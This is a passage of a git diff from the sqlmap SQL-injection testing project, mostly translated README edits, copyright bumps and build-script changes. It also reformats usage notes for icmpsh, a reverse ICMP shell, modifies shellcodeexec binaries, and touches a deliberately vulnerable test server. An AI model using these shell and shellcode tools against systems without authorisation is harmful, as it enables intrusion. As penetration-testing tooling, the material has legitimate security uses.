https://github.com/sqlmapproject/sqlmap/issues * Інструкція користувача: https://github.com/sqlmapproject/sqlmap/wiki * Поширенні питання (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-vi-VN.md b/doc/translations/README-vi-VN.md index 0dbae998992..45cbd33c6c1 100644 --- a/doc/translations/README-vi-VN.md +++ b/doc/translations/README-vi-VN.md @@ -1,16 +1,16 @@ # sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) -sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng tiêm SQL và tiếp quản các máy chủ cơ sở dữ liệu. Nó đi kèm với -một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện cơ sở dữ liệu, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập tệp của hệ thống và thực hiện các lệnh trên hệ điều hành từ xa. +sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng SQL injection và tiếp quản các máy chủ cơ sở dữ liệu. Công cụ này đi kèm với +một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập file hệ thống và thực hiện các lệnh trên hệ điều hành từ xa. Ảnh chụp màn hình ---- ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) -Bạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), chúng trình bày một số tính năng có thể tìm thấy trong wiki. +Bạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) - nơi trình bày một số tính năng có thể tìm thấy trong wiki. Cài đặt ---- @@ -18,25 +18,25 @@ Cài đặt Bạn có thể tải xuống tập tin nén tar mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc tập tin nén zip mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/zipball/master). -Tốt hơn là bạn nên tải xuống sqlmap bằng cách clone với [Git](https://github.com/sqlmapproject/sqlmap): +Tốt hơn là bạn nên tải xuống sqlmap bằng cách clone về repo [Git](https://github.com/sqlmapproject/sqlmap): git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap hoạt động hiệu quả với [Python](http://www.python.org/download/) phiên bản **2.6**, **2.7** và **3.x** trên bất kì hệ điều hành nào. +sqlmap hoạt động hiệu quả với [Python](https://www.python.org/download/) phiên bản **2.6**, **2.7** và **3.x** trên bất kì hệ điều hành nào. Sử dụng ---- -Để có được danh sách các tùy chọn cơ bản, hãy sử dụng: +Để có được danh sách các tùy chọn cơ bản và switch, hãy chạy: python sqlmap.py -h -Để có được danh sách tất cả các tùy chọn, hãy sử dụng: +Để có được danh sách tất cả các tùy chọn và switch, hãy chạy: python sqlmap.py -hh -Bạn có thể xem video chạy thử [tại đây](https://asciinema.org/a/46601). -Để có cái nhìn tổng quan về các khả năng của sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh). +Bạn có thể xem video demo [tại đây](https://asciinema.org/a/46601). +Để có cái nhìn tổng quan về sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh). Liên kết ---- @@ -44,9 +44,9 @@ Liên kết * Trang chủ: https://sqlmap.org * Tải xuống: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Nguồn cấp dữ liệu RSS về commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Theo dõi vấn đề: https://github.com/sqlmapproject/sqlmap/issues +* Theo dõi issue: https://github.com/sqlmapproject/sqlmap/issues * Hướng dẫn sử dụng: https://github.com/sqlmapproject/sqlmap/wiki * Các câu hỏi thường gặp (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Ảnh chụp màn hình: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-zh-CN.md b/doc/translations/README-zh-CN.md index 77412af78b3..d63d6da4a71 100644 --- a/doc/translations/README-zh-CN.md +++ b/doc/translations/README-zh-CN.md @@ -1,26 +1,26 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) -sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过带外数据连接的方式执行操作系统命令。 +sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。 演示截图 ---- ![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) -你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示 +你可以查看 wiki 上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 了解各种用法的示例 安装方法 ---- -你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码. +你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包好的源代码,或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包好的源代码. -推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码: +推荐直接从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6**, **2.7** 和 **3.x** 版本的任何平台上 +sqlmap 可以运行在 [Python](https://www.python.org/download/) **2.6**, **2.7** 和 **3.x** 版本的任何平台上 使用方法 ---- @@ -33,17 +33,17 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6**, **2.7 python sqlmap.py -hh -你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。 +你可以从 [这里](https://asciinema.org/a/46601) 看到一个 sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取 sqlmap 所有支持的特性、参数、命令行选项开关及详细的使用帮助。 链接 ---- * 项目主页: https://sqlmap.org * 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Commit的 RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* 问题跟踪器: https://github.com/sqlmapproject/sqlmap/issues * 使用手册: https://github.com/sqlmapproject/sqlmap/wiki * 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* 教程: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/extra/__init__.py b/extra/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/extra/__init__.py +++ b/extra/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/extra/beep/__init__.py +++ b/extra/beep/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/extra/beep/beep.py b/extra/beep/beep.py index c20ae204303..b6f8f97cf82 100644 --- a/extra/beep/beep.py +++ b/extra/beep/beep.py @@ -3,7 +3,7 @@ """ beep.py - Make a beep sound -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -18,7 +18,7 @@ def beep(): if sys.platform.startswith("win"): _win_wav_play(BEEP_WAV_FILENAME) elif sys.platform.startswith("darwin"): - _mac_beep() + _mac_wav_play(BEEP_WAV_FILENAME) elif sys.platform.startswith("cygwin"): _cygwin_beep(BEEP_WAV_FILENAME) elif any(sys.platform.startswith(_) for _ in ("linux", "freebsd")): @@ -40,9 +40,8 @@ def _speaker_beep(): def _cygwin_beep(filename): os.system("play-sound-file '%s' 2>/dev/null" % filename) -def _mac_beep(): - import Carbon.Snd - Carbon.Snd.SysBeep(1) +def _mac_wav_play(filename): + os.system("afplay '%s' 2>/dev/null" % BEEP_WAV_FILENAME) def _win_wav_play(filename): import winsound @@ -50,7 +49,7 @@ def _win_wav_play(filename): winsound.PlaySound(filename, winsound.SND_FILENAME) def _linux_wav_play(filename): - for _ in ("aplay", "paplay", "play"): + for _ in ("paplay", "aplay", "mpv", "mplayer", "play"): if not os.system("%s '%s' 2>/dev/null" % (_, filename)): return diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/extra/cloak/__init__.py +++ b/extra/cloak/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py index b76146a51ff..cce563973c5 100644 --- a/extra/cloak/cloak.py +++ b/extra/cloak/cloak.py @@ -3,7 +3,7 @@ """ cloak.py - Simple file encryption/compression utility -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -21,7 +21,7 @@ xrange = range ord = lambda _: _ -KEY = b"ENWsCymUeJcXqSbD" +KEY = b"E6wRbVhD0IBeCiGJ" def xor(message, key): return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message))) diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/extra/dbgtool/__init__.py +++ b/extra/dbgtool/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py index 9ebc30807ec..d8f93d41ff1 100644 --- a/extra/dbgtool/dbgtool.py +++ b/extra/dbgtool/dbgtool.py @@ -3,7 +3,7 @@ """ dbgtool.py - Portable executable to ASCII debug script converter -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/extra/icmpsh/README.txt b/extra/icmpsh/README.txt index 631f9ee377f..d09e83b8552 100644 --- a/extra/icmpsh/README.txt +++ b/extra/icmpsh/README.txt @@ -1,45 +1,45 @@ -icmpsh - simple reverse ICMP shell - -icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. - - ---- Running the Master --- - -The master is straight forward to use. There are no extra libraries required for the C version. -The Perl master however has the following dependencies: - - * IO::Socket - * NetPacket::IP - * NetPacket::ICMP - - -When running the master, don't forget to disable ICMP replies by the OS. For example: - - sysctl -w net.ipv4.icmp_echo_ignore_all=1 - -If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive -commands send from the master. - - ---- Running the Slave --- - -The slave comes with a few command line options as outlined below: - - --t host host ip address to send ping requests to. This option is mandatory! - --r send a single test icmp request containing the string "Test1234" and then quit. - This is for testing the connection. - --d milliseconds delay between requests in milliseconds - --o milliseconds timeout of responses in milliseconds. If a response has not received in time, - the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. - The counter is set back to 0 if a response was received. - --b num limit of blanks (unanswered icmp requests before quitting - --s bytes maximal data buffer size in bytes - - -In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. +icmpsh - simple reverse ICMP shell + +icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. + + +--- Running the Master --- + +The master is straight forward to use. There are no extra libraries required for the C version. +The Perl master however has the following dependencies: + + * IO::Socket + * NetPacket::IP + * NetPacket::ICMP + + +When running the master, don't forget to disable ICMP replies by the OS. For example: + + sysctl -w net.ipv4.icmp_echo_ignore_all=1 + +If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive +commands send from the master. + + +--- Running the Slave --- + +The slave comes with a few command line options as outlined below: + + +-t host host ip address to send ping requests to. This option is mandatory! + +-r send a single test icmp request containing the string "Test1234" and then quit. + This is for testing the connection. + +-d milliseconds delay between requests in milliseconds + +-o milliseconds timeout of responses in milliseconds. If a response has not received in time, + the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. + The counter is set back to 0 if a response was received. + +-b num limit of blanks (unanswered icmp requests before quitting + +-s bytes maximal data buffer size in bytes + + +In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. diff --git a/extra/icmpsh/icmpsh.exe_ b/extra/icmpsh/icmpsh.exe_ index 0944508047e..a909351bdac 100644 Binary files a/extra/icmpsh/icmpsh.exe_ and b/extra/icmpsh/icmpsh.exe_ differ diff --git a/extra/runcmd/runcmd.exe_ b/extra/runcmd/runcmd.exe_ index 26448b5dcb1..556eabb7be0 100644 Binary files a/extra/runcmd/runcmd.exe_ and b/extra/runcmd/runcmd.exe_ differ diff --git a/extra/shellcodeexec/linux/shellcodeexec.x32_ b/extra/shellcodeexec/linux/shellcodeexec.x32_ index 4d050d0c19a..c0857d971f5 100644 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x32_ and b/extra/shellcodeexec/linux/shellcodeexec.x32_ differ diff --git a/extra/shellcodeexec/linux/shellcodeexec.x64_ b/extra/shellcodeexec/linux/shellcodeexec.x64_ index 4bc2367a4fb..13ef7522987 100644 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x64_ and b/extra/shellcodeexec/linux/shellcodeexec.x64_ differ diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ index 7c19a51b45e..0cbe5404fce 100644 Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ diff --git a/extra/shutils/blanks.sh b/extra/shutils/blanks.sh index 236638bbe5d..147333b29ec 100755 --- a/extra/shutils/blanks.sh +++ b/extra/shutils/blanks.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Removes trailing spaces from blank lines inside project files diff --git a/extra/shutils/drei.sh b/extra/shutils/drei.sh index cbd907f3555..99bccf5c8d7 100755 --- a/extra/shutils/drei.sh +++ b/extra/shutils/drei.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Stress test against Python3 diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py index afdd130d16e..ac3caf88dee 100755 --- a/extra/shutils/duplicates.py +++ b/extra/shutils/duplicates.py @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Removes duplicate entries in wordlist like files diff --git a/extra/shutils/junk.sh b/extra/shutils/junk.sh index a36e0225b44..61365a754c1 100755 --- a/extra/shutils/junk.sh +++ b/extra/shutils/junk.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null diff --git a/extra/shutils/modernize.sh b/extra/shutils/modernize.sh deleted file mode 100755 index e23311ceca8..00000000000 --- a/extra/shutils/modernize.sh +++ /dev/null @@ -1,8 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) -# See the file 'LICENSE' for copying permission - -# sudo pip install modernize - -for i in $(find . -iname "*.py" | grep -v __init__); do python-modernize $i 2>&1 | grep -E '^[+-]' | grep -v range | grep -v absolute_import; done diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh index 9a25d123bb7..300916ae369 100755 --- a/extra/shutils/precommit-hook.sh +++ b/extra/shutils/precommit-hook.sh @@ -12,17 +12,19 @@ chmod +x .git/hooks/pre-commit PROJECT="../../" SETTINGS="../../lib/core/settings.py" +DIGEST="../../data/txt/sha256sums.txt" declare -x SCRIPTPATH="${0}" PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS +DIGEST_FULLPATH=${SCRIPTPATH%/*}/$DIGEST git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0 if [ -f $SETTINGS_FULLPATH ] then - LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"') + LINE=$(grep -o ${SETTINGS_FULLPATH} -e '^VERSION = "[0-9.]*"') declare -a LINE INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.extend([0] * (4 - len(_))); _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") if [ -n "$INCREMENTED" ] @@ -35,3 +37,6 @@ then fi git add "$SETTINGS_FULLPATH" fi + +cd $PROJECT_FULLPATH && git ls-files | sort | uniq | grep -Pv '^\.|sha256' | xargs sha256sum > $DIGEST_FULLPATH && cd - +git add "$DIGEST_FULLPATH" diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh index 0fc4aa146d6..2302268e4c1 100755 --- a/extra/shutils/pycodestyle.sh +++ b/extra/shutils/pycodestyle.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Runs pycodestyle on all python files (prerequisite: pip install pycodestyle) diff --git a/extra/shutils/pydiatra.sh b/extra/shutils/pydiatra.sh index ba5db67ae74..75c19607709 100755 --- a/extra/shutils/pydiatra.sh +++ b/extra/shutils/pydiatra.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Runs py3diatra on all python files (prerequisite: pip install pydiatra) diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh index 26651118dcb..d8649cff130 100755 --- a/extra/shutils/pyflakes.sh +++ b/extra/shutils/pyflakes.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) diff --git a/extra/shutils/pylint.sh b/extra/shutils/pylint.sh deleted file mode 100755 index 114e2f9520a..00000000000 --- a/extra/shutils/pylint.sh +++ /dev/null @@ -1,6 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) -# See the file 'LICENSE' for copying permission - -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \; diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh index 254d9941476..896985c9126 100755 --- a/extra/shutils/pypi.sh +++ b/extra/shutils/pypi.sh @@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -38,7 +38,8 @@ setup( }, download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip', license='GNU General Public License v2 (GPLv2)', - packages=find_packages(), + packages=['sqlmap'], + package_dir={'sqlmap':'sqlmap'}, include_package_data=True, zip_safe=False, # https://pypi.python.org/pypi?%3Aaction=list_classifiers @@ -67,7 +68,7 @@ cat > sqlmap/__init__.py << EOF #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -81,7 +82,7 @@ cat > README.rst << "EOF" sqlmap ====== -|Build Status| |Python 2.6|2.7|3.x| |License| |Twitter| +|Python 2.6|2.7|3.x| |License| |X| sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over @@ -159,18 +160,16 @@ Links - User's manual: https://github.com/sqlmapproject/sqlmap/wiki - Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -- Twitter: https://twitter.com/sqlmap +- X: https://x.com/sqlmap - Demos: http://www.youtube.com/user/inquisb/videos - Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots -.. |Build Status| image:: https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master - :target: https://api.travis-ci.org/sqlmapproject/sqlmap .. |Python 2.6|2.7|3.x| image:: https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg :target: https://www.python.org/ .. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE -.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg - :target: https://twitter.com/sqlmap +.. |X| image:: https://img.shields.io/badge/x-@sqlmap-blue.svg + :target: https://x.com/sqlmap .. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md .. http://rst.ninjs.org/ @@ -178,5 +177,7 @@ EOF sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done -python setup.py sdist upload +python setup.py sdist bdist_wheel +twine check dist/* +twine upload --config-file=~/.pypirc dist/* rm -rf $TMP_DIR diff --git a/extra/vulnserver/__init__.py b/extra/vulnserver/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/extra/vulnserver/__init__.py +++ b/extra/vulnserver/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py index 4cce7f933c6..f5d9f77ab01 100644 --- a/extra/vulnserver/vulnserver.py +++ b/extra/vulnserver/vulnserver.py @@ -3,7 +3,7 @@ """ vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes) -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -44,7 +44,8 @@ CREATE TABLE users ( id INTEGER, name TEXT, - surname TEXT + surname TEXT, + PRIMARY KEY (id) ); INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset'); INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny'); diff --git a/lib/__init__.py b/lib/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/lib/__init__.py +++ b/lib/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/lib/controller/__init__.py +++ b/lib/controller/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/action.py b/lib/controller/action.py index 